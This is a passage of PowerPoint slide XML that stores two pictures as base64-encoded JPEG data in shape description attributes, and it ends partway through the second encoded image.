          <p:cNvPr id="7" name="AutoShape 8" descr="data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wCEAAkGBxQSDxUUEBMUFhQUFBQVFBUUFBQUFBQUFBQXFhQUFRUYHCggGBolHBQUIjEhJSkrLi4uFx8zODMsNygtLisBCgoKDg0OGxAQGywkHyUtLCwvLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLP/AABEIAMwAzAMBEQACEQEDEQH/xAAcAAABBQEBAQAAAAAAAAAAAAAAAgMEBQYHAQj/xAA+EAACAQICBwQIBAUEAwEAAAABAgADEQQFBhIhMUFRYRMicZEHMkKBobHB0SNScuEUM2KCklOisvBjwuIW/8QAGwEAAQUBAQAAAAAAAAAAAAAAAAECAwQFBgf/xAA5EQACAQMBBQQJAgYCAwAAAAAAAQIDBBESBSExQVETYXGRIjKBobHB0eHwBhQVIzNCUvFikhZDcv/aAAwDAQACEQMRAD8A7jAAgAQAIAEACABAAgAQA8JgBGrY+mu9187yRUpvgiGVenHiyK+e0R7RPgJIrWoyF3tJcxs6Q0v6vIR37SY39/S7xQz+lzbyiftKgqv6Q/Szek3tj37Ix29RciWN1SfMmU6qt6pB8DeRNNcSaMoy4MXEHBAAgAQAIAEACABAAgAQAIAEACABAAgAQAIARsXjkpjvtbpxkkKUp8ERVK8KfrMz+N0o3imLdTtMuU7Jf3GbV2i+EFgo8Tmzv6zE++XIUYx4IoTuJS4sinEyTSQ6w7eGkXUHaw0iag7aGkNQfxENIahynjSu0G3hGuGeI5VWuBa4PSN13nWHX7yvO0hLuLlK+qR7/Ev8Bn1OpsPdPXd5ylUtZx4bzRpX1Oe57mWwaVi6ewAIAEACABAAgAQAIAEACAHl4AewARUqBRdiABxMVJt4Q2UlFZZl840oAutL/L7S/Rs+czLuL9vdT8zJYrMixuTczQjBJYRlSqZ3siNiTJFEq1KqAVY7AxTyPU2jWPUh5TEJMixEFyeEQAQ4gNZHqXjiNtoa7e0VxFjU3lzlOJoVjqOxo1NwcG9NjyZT6p99pUqqrT3r0l05mjQdKr6MvRfXk/Ho/aaBP4nC7SNen/Tdhbw3rK2aNfuZdUbi238V+eRfZbmiVluh28VO/wDcSnVoypveX6FxCqt3HoTbyIsHsACABAAgAQAIAEAGcXiBTQuxsFFz9oypNQi5S4IfCDnJRXFme0TzQ1albXPeJDjoN1vlMvZteVSc9XF4ZpbRt1TjDTw4F/jMWtJCzmwH/bTZhBzeEY1SrGnHVI57pBpI1U2GxOA+816Nuqa7zDuLmVV9xmq2MvLaRTbI5rxyIpbxS1THIq1NKW4k4emzblJ8ATIqtelS/qTUfFpBTo1qn9OLfgsk44WoouykDns+8q0dpWdxPRSqRlLomW6ljdUY66lNpdWKRpcwQpjgaNwPyeF4uAyNPUi4I3IaarFwRuQ2zA74cBYvJErUOX7/ALxMlmJoNFNMGoEUsQb0tyud9Px5r8RM29stfp0vW6dfubFle6fQm93w+xtcVlaVCKlBuzqesGX1XvtuQOfMTOt7976c/Iv1rOMvThufVFJmGfYnDVw1RLrqgVE52P8ANQ/OV76nVp/zqG+PNdPzr8jQ2fOlXTt63o1OT5S7vsa7LcelemKlJrqR5dDEt7iNaOY8ea5piVaM6UtMkSpORBAAgAQAIAEAMZ6Qcx1dSiOI1287KPn8JkbTqcKft+hs7Ko5zUfh9TGYTN3oVBUpnaPIjiD0lCg5U5aomtVoxqw0y4EzP9JjiDfcvBeXj1ndWDpzpKcOfHxPOdp0qtKu6dXlw6NdTN1sTNBIzJMjGtHYI2SKG3cCT0EJSjCLlJ4S5sidOc5aIrL6Ghy/KBYGpv36vAdDznEbS/VNTVKFqklw1Pi+9LkdXY/pmkoqdxvlxwuHg+peGotNCzWVVH/bTlKdOte3CisynJ8/j3JHQVJ0rWk5boxXQzeKzJqzXIAUeqOQ5+M9S2VsyFhR0ReW97fV/Q852ptGV3Wy9yXBdPuC1ZpYKCmL7WJgdrPDVhgRzGXqRyRHKRHapFwR5Y2MRGstU4joqxjRYg3zHDlVSrTNSmhYL6xSzEfqUbR42kbqRi9LeCzGlNrVFZ8PzJbaDaSGk4w1Y9wm1Nj7D39Q8lPwPjMba9hrj21P1lx7118TW2fd6X2c+HLu7jouJw6YhNSoNo3EbweY6zMsL5yeOfxRp3FvGS3/AOvAw9JK2W4kqNtKrfV/KH4EDkeXA24GQ3lDsH+6t+HCS6fZcn7C/bXH7pKhceuuD/yX16my0bzpcVQDDYw2OvJuNukltbpVfRfrL396I7y1dvU08uRcS4VAgAQAIAeGAHJdPcbfHVBf1Qq+Q/eYl0nOszp9nQxbx795lg7ObKLn5eMjworLNAn4fAAbXN+g3fvCnf1aLfZPGfzwKd3aUbqKjVjnBOp0lG5R5CQVL24qPMqkvP6EcLK2prEaaXsRJpAcVU+IEruvWXCcl7X9QnbUpLDivJEmnSTW1lRQbbwLRta+uatPs6lRyj0ZWp2NvSqOpCCT6pE2lM6RMyk0jxms4pj1VsW6sdw9w+c7v9J7PUKLupLfLcv/AJX1fuRxH6lvW59hHguPj9isVp2JxzQsVImBMtCu1hgXUeGpDAahBaKJgbZog+MRhhGsuQcRGuREaLEZInZTnVTDVRUpEXGwg7mXip6fKQVaUakdMi1Qqypy1ROh4rJcLmuHFan+HUI9dbayuN6VAPWsffuIMy1VqW8tL3o13Sp3EVNbmSsnesiBMR/Npd0sPVqKPVqA9Rv6gzl9p01b11Upbk967nzX5yZp2zcoaZ8Vuff3lnmGFTE0dVh4HirDiJdoXanDWlue5r4pkdSlvxzW9Po+phdGmqYPMnovuqAleRK94Ec7gsPKUbym7dKrR343x71zi/g/YzYlWV3bKUt0o7n7efg+K9qOmUqgYAjjNehXjWpxqQ4MxpRcXhi5MIEACAHhgBw/Sqi1XM8QBsUVNrctg2DrMavOMG2+OTrrPdQh4CqFEILKPufGZ0pOTyydjwjBrHFjWNY/TjJDGSqUgkRSJlIyvJEUjHVahZmb8zMfjs+E9Q2JdQlbxo8JRSWO7qvmcL+o9mVKFw63GEt+ej5p/LqJBm2cw4CgYZGODPdaGRuk8LQyLpPC0MjlESWiEiiILQJVEbYxCWMRpVsd8aWImn0Ezv8AhcUFY/g1iFYHcr+w/wBD0PSUrujrhlcUaFnW0Tw+DOtYikGWx9x5TnLuhGtTcJezuZuQk4vKKzDsUcqePz4Gc5aynQrOnPn8eT9pcqJTjqRAz/LO0ejVQfiUaisOqk2dT7iZpdstMoS4Ph3P78GRwbg8rmsPvX2e8tspq7SnLaJQ/T9zpnUtXyeV8/k/MLmPCRZzqioEACADGOxS0qbO57qi5+w6xlSpGnFylwQ+nTlUmoR4s5FmGJ7Sq9QgAuxYgdf+iczObnJyfM7ClTVOCguRGBjR7HFiDGOLGMaO04xjWSqRkMkRMkk90+B+Uhx6SIsbzH4CsLCbk1KMsxeGi/OCknGSyi2omn7SKfdH/wASvluVWRkz2JZS39lHyHMS1ErbswOqmxEfT2rfxee1ftw/kQv9P2Uv/WvYZ6hVOs6k31WsDs2jradjsu7qXEG59xxm3dm0LSolSWOO7PQe1pqGDpPNaA5REM8QkUBJaJkkURBaBIojbNEJUhs1L7DGscng7XoXnH8TgabMbuo7Op1ZNmt7xY++cxfLsqrR0NtLXTTLDGJfaN4nPXsNa1Lii/SeNwhmuAefzkEp5gpdRyWHgjYerq1Qeu33zDtrjsdoKa/yx57iWpHVTwX4no5mHsAAwAxHpAzLatFT/U/j7I+Z8pj7Tq5aprxfyNzZFDc6r8F8zDkzNwbZ6DBiDixo1jixrGsdQxjGsk0zIpIiZKp7pBIjaMTgsrrM5VF2BmHeNtxtfwnSaoTSZclVjFZZqBonX1RqOjHlu8jeM7BMqfv4J70PpowmHUVcxrAKDfsqZ9boW3m/ISejaOpLTBZZUudrxjFuO5dX8l18zKYiqGq1HAt2js1gLAAnugDooA907O0t1QpqHPmefX9zK5q6nwXD86sRrS0U9IhqkQcoEZ6l4mSVRwNmpAdgWK94C4EO8BSO7xAN76I80/FrUCdjIKq/qU6j/Bk8pz+3I4jGouuPPevmbOzJcYs6S7zk6lQ2UjzDrrI45EERLan2tGpDmt6Co9MkytJ2zi5vMmy4aWk1wDzAPwnq9CeunGXVJ+aMeSw2hclEPDADkGeY3ta7vwZjb9O4fC05ipPtKjn1OxtqXZ0ox7itJiE4pTEY1jgjRrHFMaxo6pjRrH6bSKSGMlU2kMkRNEXG3pt2ibjbW6Hn75atK2FoZJDE1pkN1dMWpLq07M/O2wfedXY7Mq1UpVPRj739DnNo7QoUm40/Sl7l9TOY3H1Kz69Zyx67h4DhOlo0KdGOILH5zOWrV51nmb+nsQzrSYr6Q14BpGmGw7YDsEepcQAYapEHDfaWiZFwKNcERchgk5Vlz4qqKNK2uwYqCbXKqW1b8zYyOrUUI6mSUaTnLCLD0d1mpZrTVgVJNSkykWIJU3UjgdZB5TI2ylKzk+mH7zSsU41sM7SzTgJTbN9Ik5ae83gPmZo7Jfpz8F8WQ3HBFfjV1ahHW/nOX2nbqlcziuGcr2/jLVJ6oJlhQzFRWpUOLUmfw1SAB/y8p3VhWxRpQ6xXwKc6DcJVejwWd5pFUg53VK4d9X1mGqo5s/dAHnILiTVN448F4sntoqVWOeHF+C3nIMYNV2AN7Ei/O2y46TntKi8I6+DbWWMXijhwRBBwGMGjimINHFMYxo6hjWhrJNNpDJEbR7j11qFRQdpRreNpLYtQuqcnw1L4lO7jJ0Z6Xh4Zz5Hnq+Dzx7+IsVIoh72kBA7SADL4mJkdgSte8Mg0Raj7dkaxyQ0zxB6Q0zRMjkjS+j+vq5nhT/5AP8lYfWQ3W+kyS1bVU6Hpto3qZlhMbRX1q608RbmQQlQ+Pqn+2YdzVzaVIPoa8af82MjV1lsinz9+6cbVgo04v83mnF5kx3KztbwH1l3Zbw5vw+ZHcckRs49cHmPkf3mVtuKdWMu74f7JrX1WjFZHnLVc4XWO53pC35V1gPlN+nB0uyzyUPel9S3iMrGWOr80zqlpuGCQs42Umf8A0wz+9VOr8ZFW9VvpvJqG+aiue44u7TnYrcdkeAxRRwGNGjgMbgRi1MQaKqVgi6zGwHGJGLk8JCYyVlTPCT+Gmzm32EtK0SXpvyF7PqRcTpJVRrWQm1zsItfdxmnY7FpXEXOeccFv4mFtXaX7Wap01l4y88un1FrpWzUmVgA5UgEA2JItu4H4S1H9O04XEZxbcU08Pisd/Ne8ypbZlOjKMliWHhrh9vgUQqTqjmD0VIAe9pAMB2kAI1SptMayRCO0iZFwIZ4mRyQ2WiZHKIgtGtkiiW+iOItmGGPKtT+LAStdzaoyfcWLeCU0fRuMYOpVrEfUbQfOcXcXqlBxzxRswhh5INerst0E5u7vNySLUIb8juWmyE8z8pq7Oq/yXLr8iOuvSwRc6qgAE7hrX8AL/SU9oZquMVxzjzJKG7LOV+j2oamY025s1Q9NY/8A1Oq2xFUqkIrrTXk19BbGo5WEs83L6nd5fMsqtK6mrgax/oPx2SC6eKUi1YrNxBd5xpmmGkdchQMQUcBjRBwGJgaOKY1iFJmNQ1KlvZXYBzPEy7RioQzzY5LA9hsLGTqClLntIrWOzYQCDz2W+k6zYtSMrVJcU2n5nB7fpyV25Pg0seWCADNYw8M91ouRuk91ouQ0nutDImDzWhkMCKhjWSREVDYRrY6KyxktG5JVESWjWx6iILRuR6RY6L7cdh7f61P4MDKG0p6bSo/+L+DLNvH+Yj6HpVCxt0PwE8rtnUuJuD6P3I3ppRWSDVrynGm5PeTqOCzpNqoByHx4zYVZU6aiuRUay8mY9IOY9lgahvYkFB4v3fqZZ2PH91fQjyTz5CVXoozfdjzKX0W5UUK1XFmqldUHhTW5v0ufgBNralxG42jTpQeVFrPj9hLWLhZtNY4vzOuzZKBT6XUy2CqqN7AAeJYASC5WabRbsWlXi/H4HHsbS1Kjp+RmX/EkfSYzWHjxOshLVFPrvEAxuBw8pjGAtTEEY4DEwNK3C0ZYnIcWNNZXbGsRj8uWsmq2w+yw3qft0k9nfVLWeqPDmupQvbOndQ0z48n0MfmGXVKLEMDbgwB1T7+HhO0tL+lcx1Qe/pzRxV3YVbeTUlu68mRNaXMlLSe60XImknYHKa1b+XTYjnsVfNrDylK52lbW39WaXdxfki1RsK9X1Iv4fEtP/wAbibbBT8O02/KZv/k1jnjL/qy29i3CXLz+xU5hllagfxqbL1Nip8GGyattf29ys0ZqXx8uJSq2lWj66wV9Q7JYlwIoreRy0jyWFEQWiZHKIgtG5HKJoNEcC4x2FZlIViaingyprAkf3LMnbFaKsqq7seeC7Z0m6sTuOTVr1vBWPyH1nAWMVTq6u5mzcR9AZSn+M3JWP7SncTVPOObY/PoImtUlCVSTGKJQaTYFK/ZCrtVGL6nBmAsutzAudk1tlXNS31yp7pNYzzS548eo9UI1PW4LkW2iya1e/BVJ+gmxsenquNXRDb56aWOpsJ1ZijOMoa62/qQ/4sG+kbOOpYH05aXnx96ONaWUdTHV151C3+fev8ZjVo4qNd51llPVQg+74FUrSFotDyNGNAOKY0BwGNGjdFbRzeRSQhjGhrH1MjGHrKGBDAEHeDtBhGUoS1ReH1GTipLTJZTKupo1h2NwGXorG3kbzVp7cu4LDafiv9GVPY1rJ5w14Ml4LIqFM3CXPNyWt4A7BK1xta8rLDnhd2738fePpbLtqTyo5ffvLpHmS1zZcaHlqyNwGOI5UKuhSooZGFiCLgwpznRkpweGuaIp0lJYa3HKtJcCtDFPTQ3Xust94DC+qfD7T0bZd3O5to1JrfvT78czlL23VGs4x4FM6X3S8yCLGq3DwjWSQQ0zW28tvlGkmDuOHyZaODwLEAVKGH7JvGqqO239Snznnt5tP9xOrTg9zln2LKRuWVFKSb6FvkT7XboAPmfkJjXNXslhcWXLiPBEyq+09ZnpOe9kaW7A2aseqYuCpzKtd/ATStaemBaox9E1GhmHtSZz7ZsPBf3J8p1Ox6Omm5vn8EZW0p5modDRTYM0DADlXpRwmpikqDdUp/7kNj8CJmXccTz1R0myKmqi49H8THBpUwao8jRjQDytI2gHVMaIKEAA8xEEPUrwcBMDgrxukTSK/iYnZiaBqpmFuUcqGRdCK7FZw24Mfdslmnax5oVQj0M9js027yW5XOzxM2Lawc1l7kZ15tKlQ9GO+XTkvEh083rqbpVdeisQPKaX8PtsYcE/FbznKu0LipLLljuXAi1KzMSzksx2kk3JPUy5CMYRUYrCXJFGbc5ZYgtHZBRGapjGx8UWeiWXfxGNpU7bNbWf9Cd5vduH90ztqXX7a0nU54wvF7kWaFPXUSO4Z5V/APQr855fZQfbexnRW69MMq7tIX3t3j793whdenVeOW4K2+bFV622Op09w2MRlq0lVMdpKoE1Ktl2lmsvvNhNGlSbxGJb3Qhl8EdQwOGFOmqDcoA8eZnYUqapwUFyOVq1HUm5PmSJIMCAGS9JOW9rgtdR3qJ1x+k7GHy8pVu4Zhnoaeyq2itp/wAt3t5HIA0zmjph9GjGgH0aRtAOq0Y0A4DGgLUxBrE1KIboeYiqTQhV5s70F17Mye0Ra69SOXWXbWnGvLRlJ9/MguLnsI6pRbXdyKhs/U8W/wATL62XU7vMqfxe27/JkarnQO4MfhJobNlzaI57aor1Yt+S+5Br5gzbtg+PnLtKypw3vezMuNq1qu6Poru4+ZGvLplNBrQyJpPNaGRyieFomRVEaZrxMjkjpXowyrs6bYhx3qo1afSmDckfqIHuUTjf1HddpNW8eEd78ft8zWsaGIub5/A2mYrrAIfzKW8BtInOUUoS1dxpUnpeoW1eNVMTSRa1fbJ4w3EkY7iNicTZTJYU8skhDMsEbR3MLY+kqbw6hv79gHjY38psWtNxlGb5vd82JdYnTnHovfyOwzoDlQgAQAbr0g6lWF1YEEcwRYiI0msMWMnFpo4JpDljYXEvSb2T3T+ZD6pmTKDi9LOyt6yrU1Nc/jzIVNpG0TEhGkbQDytGNAOqYxoBYMaIOAxBBW8WPGJ3jWsmazTRXWOth2Vf6GuF/tI3eE27bbGlaayb71x9qMW52Tqeqk8d33KTE5DWp+sFPg6n4GxmpS2hQqeq35MzKlhWh6yXmvsVrAg2O+XE870U2sPDEsYoYPNeAC4AWmSZG+JbZ3aYNmf5hRxMoXt/Tto9Zcl9S5aWc67zwjzZZ4TQ9jiW1+7QVja7Au6jcBbdfbtlGrtiMaC075tdNyLcNmS7V6vVz13s6Vl6AAWFlAAUbhYbBs5Tj6ry3ni+JrOGFhCa2Jux8Ysae4VQ3DLV45UxdJGettkyhuJFEpdJM5FFBxc+ovXmeg+s0dn2Trz/AOK4v5EF1dRtoZ/ufBEr0ZYJnxlLWJJDGpUPNrXO3xtNCTVS4SjwXDuSIKidGzer1nxfVvidymgc8EACABADEek3R/tqHb0x+JRB1rb2p7z5b/OVbmnlaka2y7rs59nLg/j9zkaPKTR0ZIR5G0A+jyNoB5WjGgHFaMaAcBiAKBiCYFgxMCDOLwdOqLVUVhwuNo8DvEkpV6tF5pyaIatCnVWJrP51KXFaJUz/AC3Zeh7w+806W2qkfXin7jMq7Hpv1G17yvqaHVfZqUz4hh95bW2qXOL9xUex6q4SXvPaOhdT26qD9Ksx+No2W26a9WD9rSFjsep/dJe8t8PorSUbSWb8zWsOZVd1+plGptitN7ty6L6/QuQ2VSit+99X9C8w1FaaBKYsoFgBMupOVSTnN72aEKcYRUYrcidh6PFvL7ytOfQVslVa+qpPlIowyxuCt15bwPwJZ4JCpEbF4tadNnc2VRc/aTUaMqs1CPFjKk404OcuCMjhsHUxNY1q11X2Qd9uAUchzm9XrUraj2FLe+f53mVa0KlxW/cVVhck/wA5HafRpkvZ0jWIsagC0xyQHafeflIrOm0nOXMj2rXUpKlHguPj9jby8ZAQAIAEAEsLwA4r6QNGThK+vTH4FQkrbcjcU6dJn1aWh9x1Oz7zt4Yl6y9/eZhHkDRoD6PI2gH0eMaAdV5G0A6rxrQCw0bgBYMTAmBQaAmBQaJgD0GJgTAoGIJgUsR5DA8jW3RjWRrHBVjNIYI9atc9JJGGBUhGtH4DA09SKkOSI2Js1tYAgG4B3X4G3GTU5Sh6rwJKnGXrLJf6I6ONi6ms4Ioqe8d2uR7C/U8Jbtrd1Hl8ClfXqoRxH1n7u/6HWqaBQAoAAAAAFgANwAmwlg5hvLyxUBAgAQAIAEAK7OMGlek1KqusjCx5jkQeBHONlFSWGSUqsqU1OL3o4ZpHkdTB1tR9qG5pvwYfRhxEoVKbi8HWWt1C4hqXHmvzkV6PImiyPI8jaAeV4xoB1XjGgHVeNaAWrRuBRYaNwIKDQwGBQaJgTB7eGBBQaNwJgV2kTAYEtUvFwGDzWigNvVjlEVIYerHqI40mjGij4gh690pb7bnqeHIdfKX7e0cvSlwMq82lGl6NPfL3I6lg6C00CU1CqosFAsAJppJLCOdnNzk5SeWPxRoQAIAEACABACPXWAGezzLUr0zTqrdT5g8GB4GJKKksMlo1p0paoM5Jn+Q1MK23vUz6rj4BuRlGpScTqLS9hcLdul0+hWI8haLg8jxjQDyvGNAOh41oBavGNALDxrQCw8TACg8TACg8TAHuvDAYDXhgQ8NSCiA1UrRyiBAq5ku0A3I5cPEyyreWMtYGxnGTxF5N3ofkSmmlasl3bvKreqq+z3eJtt2zQoW8YrL4mBtC+m5unB7l05m/wqy0ZBYoIAKgAQAIAEACABABLreAELEUIAUmYYAMpDAEEEEEXBB4WgLGTi8ric+z7Q0qS2H3caZ/9T9DK06HOJuWu1f7a3n9TI1FZGKuCrDeDsI90qyjjczbjOMlmLyhaVYxxFHVqxriA6taMcQHBVjdIChViaQFCpE0gKDxMAHaQ0gBqQ0gRMZi2Ufh0y7HwCjxJlijQhN/zJaV7yvcVakFinByfkvaypqYPEVj+IwAJ9UE+4WG+XlXoUt1GOX1Znu3uqu+tLEeiePP/ZvdEdB9Uq+IGwWKoR8WHAdI6FOcnrmV7m+jTh2VDwyt3l9TpeEwssGMWlGlaAD8ACABAAgAQAIAEACAHhF4AR6uGBgBX4jL78IAUWbaOU6wtUQNyO5h4HeI2UU+JNRuKlF5g8GKzTQGotzh3DD8j7D7mGw++0glb9DZobYXCqvavoZjHYGrQP41Nk6kd3/Ld8ZXlTkuKNSlcUq3qST+PkN1AygFgQp3MR3T4NuMboZJGcZPCe8FqxjiPHBXMbpEFdv1iaUGAOIHE/GGkXB7Sq63qXbovePwiqm+gyUox4vBZYXJcTU9Wi+3iw1R/utJFbzfIrTv7eHGXlvLzAaC1msazqg5KNdvM2A+Mmjaf5MoVdsRW6nHPibDJ9FqVGxRO9+dtre48PdLUKUYcEZNe7q1vWe7pyNDQwdpIViYlICADkACABAAgAQAIAEACABAAgAQA8IgAhqIMAGXwQMAI9TLQRawseFriAFeujdJSdRAut6wUWVvFNx8omlEjqyfF5IOK0Jwz+tRQHmo1D/tjXCL4olheV4cJMq6vo0w59Vqq+DA/wDIGMdCJajtW4XHD9hZ4PQ6kigMiVCPaelTDe8qovJFBIqVLmcnlPHtZOpaOUl3UqY8EX7RcIidSb4t+ZNpZWBuFvDZFGN5JCYACAD6YYCADoQQAVAAgAQAIAEACABAAgAQAIAEACABAAgAQAIAEACABAAgAQAIAEACABAAgAQAIAEACABAAgAQA//Z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0" descr="data:image/jpeg;base64,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